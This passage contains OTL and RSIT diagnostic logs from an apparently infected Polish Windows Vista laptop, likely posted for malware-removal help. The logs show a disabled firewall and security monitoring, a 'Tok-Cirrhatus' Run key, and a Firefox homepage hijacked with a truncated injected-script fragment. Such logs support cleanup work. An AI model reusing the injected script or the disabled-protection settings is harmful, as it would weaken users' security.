CDROM.SYS >[/color] [2008-01-19 07:49:51 | 000,067,072 | ---- | M] (Microsoft Corporation) MD5=1EC25CEA0DE6AC4718BF89F9E1778B57 -- C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_cdrom.inf_31bf3856ad364e35_6.0.6001.18000_none_5fa95be2a3c76a4a\cdrom.sys [2006-11-02 10:51:44 | 000,067,072 | ---- | M] (Microsoft Corporation) MD5=8D1866E61AF096AE8B582454F5E4D303 -- C:\Windows\System32\drivers\cdrom.sys [2006-11-02 10:51:44 | 000,067,072 | ---- | M] (Microsoft Corporation) MD5=8D1866E61AF096AE8B582454F5E4D303 -- C:\Windows\System32\DriverStore\FileRepository\cdrom.inf_e487f727\cdrom.sys [color=#A23BEC]< MD5 for: NDIS.SYS >[/color] [2006-11-02 11:51:42 | 000,500,840 | ---- | M] (Microsoft Corporation) MD5=227C11E1E7CF6EF8AFB2A238D209760C -- C:\Windows\System32\drivers\ndis.sys [2006-11-02 11:51:42 | 000,500,840 | ---- | M] (Microsoft Corporation) MD5=227C11E1E7CF6EF8AFB2A238D209760C -- C:\Windows\winsxs\x86_microsoft-windows-ndis_31bf3856ad364e35_6.0.6000.16386_none_a59069cb1f23fc44\ndis.sys [2008-01-19 09:43:31 | 000,529,464 | ---- | M] (Microsoft Corporation) MD5=9BDC71790FA08F0A0B5F10462B1BD0B1 -- C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_microsoft-windows-ndis_31bf3856ad364e35_6.0.6001.18000_none_a7c72bc71c0f0d18\ndis.sys [color=#A23BEC]< MD5 for: WINLOGON.EXE >[/color] [2006-11-02 11:45:57 | 000,308,224 | ---- | M] (Microsoft Corporation) MD5=9F75392B9128A91ABAFB044EA350BAAD -- C:\Windows\System32\winlogon.exe [2006-11-02 11:45:57 | 000,308,224 | ---- | M] (Microsoft Corporation) MD5=9F75392B9128A91ABAFB044EA350BAAD -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6000.16386_none_6d8c3f1ad8066b21\winlogon.exe [2008-01-19 09:33:37 | 000,314,880 | ---- | M] (Microsoft Corporation) MD5=C2610B6BDBEFC053BBDAB4F1B965CB24 -- C:\Windows\SoftwareDistribution\Download\2b4e48d0ede6112a59b10e3704a22eee\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6001.18000_none_6fc30116d4f17bf5\winlogon.exe [color=#E56717]========== Alternate Data Streams ==========[/color] @Alternate Data Stream - 144 bytes -> C:\ProgramData\TEMP:CB0AACC9 < End of report > [/log] Extras: [log] OTL Extras logfile created on: 2011-07-18 10:25:13 - Run 1 OTL by OldTimer - Version 3.2.26.1 Folder = C:\7'\naprawa\rejestr Windows Vista Home Premium Edition (Version = 6.0.6000) - Type = NTWorkstation Internet Explorer (Version = 7.0.6000.16982) Locale: 00000415 | Country: Polska | Language: PLK | Date Format: yyyy-MM-dd 1,99 Gb Total Physical Memory | 1,00 Gb Available Physical Memory | 50,02% Memory free 4,21 Gb Paging File | 3,12 Gb Available in Paging File | 74,07% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files Drive C: | 142,25 Gb Total Space | 46,21 Gb Free Space | 32,48% Space Free | Partition Type: NTFS Computer Name: MAX-PC | User Name: Max | Logged in as Administrator. Boot Mode: Normal | Scan Mode: All users Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: Off | File Age = 60 Days [color=#E56717]========== Extra Registry (SafeList) ==========[/color] [color=#E56717]========== File Associations ==========[/color] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>] .cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%* .hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation) .html [@ = Opera.HTML] -- "C:\Program Files\Opera\Opera.exe" "%1" .url [@ = InternetShortcut] -- rundll32.exe ieframe.dll,OpenURL %l [HKEY_USERS\S-1-5-21-3224443864-345457774-4058443421-1000\SOFTWARE\Classes\<extension>] .html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) [color=#E56717]========== Shell Spawning ==========[/color] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command] batfile [open] -- "%1" %* cmdfile [open] -- "%1" %* comfile [open] -- "%1" %* cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%* exefile [open] -- "%1" %* helpfile [open] -- Reg Error: Key error. hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation) htmlfile [edit] -- Reg Error: Key error. http [open] -- "C:\Program Files\Opera\Opera.exe" "%1" https [open] -- "C:\Program Files\Opera\Opera.exe" "%1" inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation) InternetShortcut [open] -- rundll32.exe ieframe.dll,OpenURL %l piffile [open] -- "%1" %* regfile [merge] -- Reg Error: Key error. scrfile [config] -- "%1" scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l scrfile [open] -- "%1" /S txtfile [edit] -- Reg Error: Key error. Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1 Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation) Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation) Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation) Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation) Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation) [color=#E56717]========== Security Center Settings ==========[/color] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center] "cval" = 1 "UacDisableNotify" = 1 "InternetSettingsDisableNotify" = 1 "AutoUpdateDisableNotify" = 1 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring] "DisableMonitoring" = 1 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus] "DisableMonitoring" = 1 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall] "DisableMonitoring" = 1 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc] "AntiVirusOverride" = 0 "AntiSpywareOverride" = 0 "FirewallOverride" = 0 [color=#E56717]========== System Restore Settings ==========[/color] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore] "DisableSR" = 0 [color=#E56717]========== Firewall Settings ==========[/color] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] "DisableNotifications" = 0 "EnableFirewall" = 0 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] "DisableNotifications" = 0 "EnableFirewall" = 0 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile] "DisableNotifications" = 0 "EnableFirewall" = 0 [color=#E56717]========== Authorized Applications List ==========[/color] [color=#E56717]========== Vista Active Open Ports Exception List ==========[/color] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules] "{28EEAA2C-4990-4E47-8B55-4FC0F44A2C1A}" = lport=139 | protocol=6 | dir=in | app=system | "{2CDEC398-5851-43AA-8F86-26CC9DA26C50}" = rport=139 | protocol=6 | dir=out | app=system | "{2FC0FA4B-0D6A-4BED-9D0E-20527C61DEB4}" = lport=445 | protocol=6 | dir=in | app=system | "{56ACE75E-935D-4AD4-B3C2-29DE2CA5A93B}" = rport=445 | protocol=6 | dir=out | app=system | "{595B97A9-83DA-4EAC-9116-E81C37F7151F}" = rport=138 | protocol=17 | dir=out | app=system | "{6B6A6309-617B-4795-9CAD-1F531C801EBD}" = lport=138 | protocol=17 | dir=in | app=system | "{79845FDC-0136-4BFC-8B34-474905E4601F}" = rport=137 | protocol=17 | dir=out | app=system | "{930A0E57-3817-4C5C-8B9A-D2C5B04608A7}" = lport=137 | protocol=17 | dir=in | app=system | "{9FB1C863-C39E-439F-837B-657E25C7A2BF}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 | "{BF8E882D-64B2-4B23-9A25-DD8008B4179A}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe | [color=#E56717]========== Vista Active Application Exception List ==========[/color] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules] "{2CAD9D8D-DC11-46B0-8BF5-21B97DF319D6}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 | "{6D832A18-FADB-41C9-949C-653AA5D1FBEB}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 | "{A7929FC4-2346-4FD7-ABA3-AB8FF2C9C118}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 | "{C4F3D4D4-F12D-4CFC-ADB7-EC3E03B034A7}" = protocol=6 | dir=in | app=c:\program files\opera\opera.exe | "{CB4DBF06-DA44-42C8-8453-673ED6028588}" = protocol=17 | dir=in | app=c:\program files\opera\opera.exe | "{D0F9C983-A24D-4F33-9EA2-7AD2B669132E}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 | [color=#E56717]========== HKEY_LOCAL_MACHINE Uninstall List ==========[/color] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall] "{03D1988F-469F-4843-8E6E-E5FE9D17889D}" = ThinkPad Bluetooth with Enhanced Data Rate Software 6.0.1.4900 "{0F4EFCE8-E358-4430-A504-F55F32BA1816}" = Client Security Solution "{1007F41F-7D69-468E-8017-3849A5A973C2}" = ThinkVantage Technologies Welcome Message "{1297C681-92D7-40EF-93BF-03F66EC5105C}" = ThinkPad EasyEject Utility "{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 "{296B2D8E-CE82-92AF-B2E8-A646E7CB78A2}_is1" = RegAlyzer "{2BD5C305-1B27-4D41-B690-7A61172D2FEB}" = Macromedia Flash 8 "{2DA85B02-13C0-4E6D-9A76-22E6B3DD0CB2}" = SymNet "{3248F0A8-6813-11D6-A77B-00B0D0160020}" = Java(TM) 6 Update 2 "{3672B097-EA69-4bfe-B92F-29AE6D9D2B34}" = Norton Internet Security "{399C37FB-08AF-493B-BFED-20FBD85EDF7F}" = Integrated Camera "{3CCAD2EF-CFF2-4637-82AA-AABF370282D3}" = ccCommon "{45A66726-69BC-466B-A7A4-12FCBA4883D7}" = HiJackThis "{46A84694-59EC-48F0-964C-7E76E9F8A2ED}" = ThinkVantage Active Protection System "{48185814-A224-447A-81DA-71BD20580E1B}" = Norton Internet Security "{4843B611-8FCB-4428-8C23-31D0A5EAE164}" = Norton Confidential Browser Component "{4AB5764A-3894-49A2-BAA8-C4665F74CD4C}" = Registry patch to improve USB device detection on resume from sleep for Windows Vista "{5546CDB5-2CE2-498B-B059-5B3BF81FC41F}" = Macromedia Extension Manager "{59F6A514-9813-47A3-948C-8A155460CC2A}" = RICOH R5C83x/84x Flash Media Controller Driver Ver.3.52.02 "{5AA2CD16-706F-41f3-87C5-2B5A031F2B3B}" = Norton Internet Security "{6280149E-EFF3-4F1B-BD43-5B7EDD6F620A}" = Lenovo Care Supplement "{65706020-7B6F-41F2-8047-FC69579E386A}" = Presentation Director "{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}" = Windows Media Player Firefox Plugin "{72005434-30E9-49D9-A5E4-D1AE5D34DB71}" = Windows Live Toolbar "{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable "{77772678-817F-4401-9301-ED1D01A8DA56}" = SPBBC 32bit "{786547F9-59BB-4FA3-B2D8-327FF1F14870}" = Adobe Flash Player 9 ActiveX "{796E076A-82F7-4D49-98C8-DEC0C3BC733A}" = Diskeeper Home "{7E4C16B8-8F76-4940-8505-98E93C00BF19}" = Rescue and Recovery "{7EB114D8-207F-45AE-BABD-1669715F2630}" = ThinkVantage Access Connections "{830D8CBD-C668-49e2-A969-C2C2106332E0}" = Norton AntiVirus "{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable "{8675339C-128C-44DD-83BF-0A5D6ABD8297}" = System Update "{885A63EA-382B-4DD4-A755-14809B8557D6}" = Macromedia Flash Player 8 "{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight "{8BF2C401-02CE-424D-BC26-6C4F9FB446B6}" = Macromedia Flash 8 Video Encoder "{90110415-6000-11D3-8CFE-0150048383C9}" = Microsoft Office Professional Edition 2003 "{90260415-6000-11D3-8CFE-0150048383C9}" = Microsoft Office XP Web Components "{90A40415-6000-11D3-8CFE-0150048383C9}" = Microsoft Office 2003 Web Components "{92AD5564-AFE0-4CED-B7D1-370896752872}" = ThinkPad Mobility Center Customization "{986F64DC-FF15-449D-998F-EE3BCEC6666A}" = Help Center "{9A129ABC-A53A-4209-A21E-D5DEDFB7CCA8}" = Norton Protection Center "{9EFDFBA8-9174-3C61-8645-28376C5CA994}" = Microsoft .NET Framework 3.5 Language Pack SP1 - plk "{AC76BA86-7AD7-1045-7B44-AA0000000001}" = Adobe Reader X - Polish "{B293806D-4407-4287-A00C-E9064174EF89}" = Network Magic "{B7C61755-DB48-4003-948F-3D34DB8EAF69}" = MSRedist "{BC4AE628-81A4-4FC6-863A-7A9BA2E2531F}" = Nokia Connectivity Cable Driver "{C6FA39A7-26B1-480A-BC74-6D17531AC222}" = Access Help "{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1 "{CF52099A-3BEA-4C41-AEA8-1E190F04D737}" = Lenovo Care "{D353CC51-430D-4C6F-9B7E-52003DA1E05A}" = Norton Confidential Web Protection Component "{D6E6FA4A-5445-4850-8365-CF216C1CBB7A}" = Symantec Real Time Storage Protection Component "{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}" = ThinkPad Power Manager "{DB71210F-8314-4AE3-B7A7-EBAF85BD30E9}" = Wallpapers "{DBA4DB9D-EE51-4944-A419-98AB1F1249C8}" = LiveUpdate Notice (Symantec Corporation) "{E3EFA461-EB83-4C3B-9C47-2C1D58A01555}" = Norton Internet Security "{E5EE9939-259F-4DE2-8023-5C49E16A4F43}" = Norton Internet Security "{E7E836B8-4BDD-454F-82E6-5FEA17C83AD4}" = Message Center "{EFB5B3B5-A280-4E25-BE1C-634EEFE32C1B}" = AppCore "{F4DB525F-A986-4249-B98B-42A8066251CA}" = AV "33B90F7893A16FA92E149B05C5B46C501B4202CD" = Windows Driver Package - Lenovo (IBMPMDRV) System (05/31/2007 1.43) "4CF15B23EAB3D8AAA1E32F8ED986D8811D81835D" = Windows Driver Package - Intel System (09/15/2006 8.0.0.1008) "510EA369DBF270C677B57C6DBD41B0EB6B269FDB" = Windows Driver Package - Broadcom (b57nd60x) Net (05/09/2007 10.39.0.0) "530B366ABB8F4E0087E6FB2DE3609611DF9D8D27" = Windows Driver Package - Intel USB (09/15/2006 8.0.0.1008) "5B35493BBF3623E997EADC90AFF8AA66DF7A114F" = Windows Driver Package - Intel System (09/15/2006 8.2.0.1000) "67CCAA793684CADDDCD55BAD807632E611CA05D2" = Windows Driver Package - Intel (iaStor) hdc (02/12/2007 7.0.0.1020) "787E3A824531CE2DB2180F5CFAD00B052D0E389E" = Windows Driver Package - Intel System (09/15/2006 8.0.0.1010) "Adobe Flash Player Plugin" = Adobe Flash Player 10 Plugin "AIMP2" = AIMP2 "avast" = avast! Free Antivirus "AwayTask" = Maintenance Manager "CNXT_HDAUDIO" = Conexant HD Audio "CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_5045&SUBSYS_17AA20DA" = HDAUDIO Soft Data Fax Modem with SmartCP "DAEMON Tools Toolbar" = DAEMON Tools Toolbar "Dipmon" = Registry Patch of Enabling Device Initiated Power Management(DIPM) on SATA for Windows Vista "E40782D0B0D2A7F661A275F639A54DDA57386FB8" = Windows Driver Package - Intel hdc (12/06/2006 6.8.0.3002) "E6CEFD9A59425A2A27E92572AB367B28C371D3D8" = Windows Driver Package - Intel System (09/15/2006 7.0.0.1011) "FPIRPOn" = Registry patch of Changing Timing of IDLE IRP by Finger Print Driver for Windows Vista "HDMI" = Intel(R) Graphics Media Accelerator Driver "ipla" = ipla 2.3.3 "iPlus manager_is1" = iPlus manager 2.0 "KLiteCodecPack_is1" = K-Lite Codec Pack 4.2.5 (Standard) "Lenovo Registration" = Lenovo Registration "LENOVO.SMIIF" = Lenovo System Interface Driver "LiveUpdate" = LiveUpdate 3.2 (Symantec Corporation) "LudoRace" = LudoRace "McAfee Security Scan" = McAfee Security Scan Plus "Microsoft .NET Framework 3.5 Language Pack SP1 - plk" = Pakiet językowy programu Microsoft .NET Framework 3.5 z dodatkiem SP1 — PLK "Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1 "Mozilla Firefox 5.0.1 (x86 pl)" = Mozilla Firefox 5.0.1 (x86 pl) "OnScreenDisplay" = On Screen Display "PC-Doctor 5 for Windows" = PC-Doctor 5 for Windows "PhotoScape" = PhotoScape "Picasa 3" = Picasa 3 "Power Management Driver" = ThinkPad Power Management Driver "SymSetup.{5AA2CD16-706F-41f3-87C5-2B5A031F2B3B}" = Norton Internet Security (Symantec Corporation) "ThinkPad FullScreen Magnifier" = ThinkPad FullScreen Magnifier "TrackPoint" = ThinkPad TrackPoint Driver "Trojan Remover_is1" = Trojan Remover 6.8.2 "USBPMon" = Registry patch for Windows Vista USB S3 PM Enablement "Windows Live Toolbar" = Windows Live Toolbar "WinRAR archiver" = Archiwizator WinRAR [color=#E56717]========== Last 10 Event Log Errors ==========[/color] [ Application Events ] Error - 2011-07-10 17:57:10 | Computer Name = MAX-PC | Source = Application Hang | ID = 1002 Description = Program iexplore.exe w wersji 7.0.6000.16982 zatrzymał interakcję z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemu w panelu sterowania raportami i rozwiązaniami problemów. Identyfikator procesu: 900 Godzina rozpoczęcia: 01cc3f483ab38320 Godzina zakończenia: 64 Error - 2011-07-11 03:47:09 | Computer Name = MAX-PC | Source = Google Update | ID = 20 Description = Error - 2011-07-11 15:49:48 | Computer Name = MAX-PC | Source = Google Update | ID = 20 Description = Error - 2011-07-12 07:06:43 | Computer Name = MAX-PC | Source = Application Error | ID = 1000 Description = Aplikacja powodująca błąd iexplore.exe, wersja 7.0.6000.16982, sygnatura czasowa 0x4b2b56f5, moduł powodujący błąd msxml3.dll, wersja 8.100.3501.0, sygnatura czasowa 0x4a801b45, kod wyjątku 0xc0000005, przesunięcie błędu 0x0005eec1, identyfikator procesu 0x1710, godzina rozpoczęcia aplikacji 0x01cc4083c0a0d140. Error - 2011-07-12 08:18:09 | Computer Name = MAX-PC | Source = Application Error | ID = 1000 Description = Aplikacja powodująca błąd iexplore.exe, wersja 7.0.6000.16982, sygnatura czasowa 0x4b2b56f5, moduł powodujący błąd Flash9d.ocx, wersja 9.0.47.0, sygnatura czasowa 0x466dd731, kod wyjątku 0xc0000005, przesunięcie błędu 0x0010d1e8, identyfikator procesu 0xef0, godzina rozpoczęcia aplikacji 0x01cc4087ac7d8ee5. Error - 2011-07-12 08:19:26 | Computer Name = MAX-PC | Source = Application Error | ID = 1000 Description = Aplikacja powodująca błąd iexplore.exe, wersja 7.0.6000.16982, sygnatura czasowa 0x4b2b56f5, moduł powodujący błąd Flash9d.ocx, wersja 9.0.47.0, sygnatura czasowa 0x466dd731, kod wyjątku 0xc0000005, przesunięcie błędu 0x0010d1e8, identyfikator procesu 0xb1c, godzina rozpoczęcia aplikacji 0x01cc408dd2cacc65. Error - 2011-07-12 08:21:16 | Computer Name = MAX-PC | Source = Application Error | ID = 1000 Description = Aplikacja powodująca błąd iexplore.exe, wersja 7.0.6000.16982, sygnatura czasowa 0x4b2b56f5, moduł powodujący błąd Flash9d.ocx, wersja 9.0.47.0, sygnatura czasowa 0x466dd731, kod wyjątku 0xc0000005, przesunięcie błędu 0x0010d1e8, identyfikator procesu 0xe5c, godzina rozpoczęcia aplikacji 0x01cc408e008985b5. Error - 2011-07-12 08:22:30 | Computer Name = MAX-PC | Source = Application Error | ID = 1000 Description = Aplikacja powodująca błąd iexplore.exe, wersja 7.0.6000.16982, sygnatura czasowa 0x4b2b56f5, moduł powodujący błąd msxml3.dll, wersja 8.100.3501.0, sygnatura czasowa 0x4a801b45, kod wyjątku 0xc0000005, przesunięcie błędu 0x0005eec1, identyfikator procesu 0x7cc, godzina rozpoczęcia aplikacji 0x01cc408e5a3228b5. Error - 2011-07-13 05:34:32 | Computer Name = MAX-PC | Source = Application Hang | ID = 1002 Description = Program iexplore.exe w wersji 7.0.6000.16982 zatrzymał interakcję z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemu w panelu sterowania raportami i rozwiązaniami problemów. Identyfikator procesu: 958 Godzina rozpoczęcia: 01cc413fbcb54090 Godzina zakończenia: 43 Error - 2011-07-14 16:20:27 | Computer Name = MAX-PC | Source = Application Error | ID = 1000 Description = Aplikacja powodująca błąd wmplayer.exe, wersja 11.0.6000.6353, sygnatura czasowa 0x4aa91b5d, moduł powodujący błąd ole32.dll, wersja 6.0.6000.16386, sygnatura czasowa 0x4549bd92, kod wyjątku 0xc0000005, przesunięcie błędu 0x00041022, identyfikator procesu 0xb68, godzina rozpoczęcia aplikacji 0x01cc426283134c27. [ System Events ] Error - 2011-07-16 04:43:48 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7026 Description = Error - 2011-07-16 08:02:07 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7000 Description = Error - 2011-07-16 08:02:07 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7026 Description = Error - 2011-07-17 07:44:23 | Computer Name = MAX-PC | Source = EventLog | ID = 6008 Description = Poprzednie zamknięcie systemu przy 13:43:05 na 2011-07-17 było nieoczekiwane. Error - 2011-07-17 07:45:17 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7000 Description = Error - 2011-07-17 07:45:17 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7026 Description = Error - 2011-07-17 09:50:59 | Computer Name = MAX-PC | Source = EventLog | ID = 6008 Description = Poprzednie zamknięcie systemu przy 13:45:15 na 2011-07-17 było nieoczekiwane. Error - 2011-07-17 16:10:49 | Computer Name = MAX-PC | Source = EventLog | ID = 6008 Description = Poprzednie zamknięcie systemu przy 22:08:38 na 2011-07-17 było nieoczekiwane. Error - 2011-07-17 16:11:42 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7000 Description = Error - 2011-07-17 16:11:42 | Computer Name = MAX-PC | Source = Service Control Manager | ID = 7026 Description = < End of report > [/log] RSIT: [log] Logfile of random's system information tool 1.09 (written by random/random) Run by Max at 2011-07-18 10:37:19 Microsoft® Windows Vista™ Home Premium System drive C: has 47 GB (32%) free of 146 GB Total RAM: 2038 MB (43% free) HijackThis download failed ======Scheduled tasks folder====== C:\Windows\tasks\Norton Internet Security - Uruchom pełne skanowanie systemu - Max.job C:\Windows\tasks\Sprawdź aktualizacje paska narzędzi Windows Live Toolbar.job C:\Windows\tasks\User_Feed_Synchronization-{D9B30BB4-63C0-47D4-A444-A174F9308500}.job =========Mozilla firefox========= ProfilePath - C:\Users\Max\AppData\Roaming\Mozilla\Firefox\Profiles\nx4xd3id.default prefs.js - "browser.startup.homepage" - "http://my.daemon-search.com/|javascript:(function(){function%20a(o){var%20script=document.createElement('script' prefs.js - "extensions.enabledItems" - "{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}:1.3.6, {20a82645-c095-46ed-80e3-08825760534b}:0.0.0, {E2883E8F-472F-4fb0-9522-AC9BF37916A7}:1.6.2.103, {82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}:5.3.0.7550, wrc@avast.com:6.0.1203, DTToolbar@toolbarnet.com:1.1.4.0024, {972ce4c6-7e08-4474-a285-3208198ce6fd}:3.6.18" "{20a82645-c095-46ed-80e3-08825760534b}"=c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\ "wrc@avast.com"=C:\Program Files\AVAST Software\Avast\WebRep\FF [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer] "Description"=Adobe® Flash® Player 10.1 Plugin "Path"=C:\Windows\system32\Macromed\Flash\NPSWF32.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@google.com/npPicasa3,version=3.0.0] "Description"=Picasa3 plugin "Path"=C:\Program Files\Google\Picasa3\npPicasa3.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0] "Description"=Ag Player Plugin "Path"=c:\Program Files\Microsoft Silverlight\4.0.60531.0\npctrl.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/WPF,version=3.5] "Description"=Windows Presentation Foundation plug-in for Mozilla browsers "Path"=c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll C:\Program Files\Mozilla Firefox\extensions\ {972ce4c6-7e08-4474-a285-3208198ce6fd} C:\Program Files\Mozilla Firefox\components\ binary.manifest browsercomps.dll C:\Program Files\Mozilla Firefox\plugins\ np-mswmp.dll NPOFFICE.DLL nppdf32.dll WMP Firefox Plugin License.rtf WMP Firefox Plugin RelNotes.txt C:\Program Files\Mozilla Firefox\searchplugins\ allegro-pl.xml fbc-pl.xml google.xml merlin-pl.xml pwn-pl.xml wikipedia-pl.xml wp-pl.xml C:\Users\Max\AppData\Roaming\Mozilla\Firefox\Profiles\nx4xd3id.default\extensions\ DTToolbar@toolbarnet.com nostmp {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} {E2883E8F-472F-4fb0-9522-AC9BF37916A7} C:\Users\Max\AppData\Roaming\Mozilla\Firefox\Profiles\nx4xd3id.default\searchplugins\ daemon-search.xml ======Registry dump====== [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}] Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2010-11-15 62376] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1E8A6170-7264-4D0F-BEAE-D42A53123C75}] C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBho.dll [2007-01-12 96936] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}] SSVHelper Class - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll [2007-07-12 501136] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}] avast! WebRep - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2011-07-04 820864] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0}] Windows Live Toolbar Helper - c:\Program Files\Windows Live Toolbar\msntb.dll [2007-02-12 546672] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F040E541-A427-4CF7-85D8-75E3E0F476C5}] CPwmIEBrowserHelper Object - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll [2007-08-09 795960] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar] {90222687-F593-4738-B738-FBEE9C7B26DF} - Show Norton Toolbar - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\UIBHO.dll [2007-01-12 607888] {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - Windows Live Toolbar - c:\Program Files\Windows Live Toolbar\msntb.dll [2007-02-12 546672] {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - avast! WebRep - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2011-07-04 820864] {32099AAC-C132-4136-9E9A-4E364A424E17} - DAEMON Tools Toolbar - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll [2011-01-20 988480] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] ""= [] "MSConfig"=C:\Windows\system32\msconfig.exe [2006-11-02 222208] "avast"=C:\Program Files\AVAST Software\Avast\avastUI.exe [2011-07-04 3493720] "TrojanScanner"=C:\Program Files\Trojan Remover\Trjscan.exe [2011-05-18 1233856] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "Tok-Cirrhatus"= [] [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ACTray] C:\Program Files\ThinkPad\ConnectUtilities\ACTray.exe 